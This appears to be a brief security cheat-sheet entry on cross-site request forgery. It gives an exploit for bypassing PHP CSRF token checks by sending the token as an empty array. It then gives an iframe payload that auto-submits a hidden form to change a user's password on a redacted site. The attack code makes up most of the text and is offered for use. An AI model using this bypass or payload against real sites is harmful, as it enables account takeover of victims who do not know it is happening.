Cross Site Request Forgery (CSRF)
PHP CSRF Protection Bypass : EXPLOIT : csrftoken[]=&message=x -> Supply an empty array on the CSRF token parameter. You can find multiple csrf protection frameworks on GitHub which are vulnerable.

Got the solution :
<iframe src='data:text/html,<body onload="document.forms[0].submit()"><form action="//redacted.com/api/auth?password=Chang3dd" method="post"></body>'></iframe>
Last updated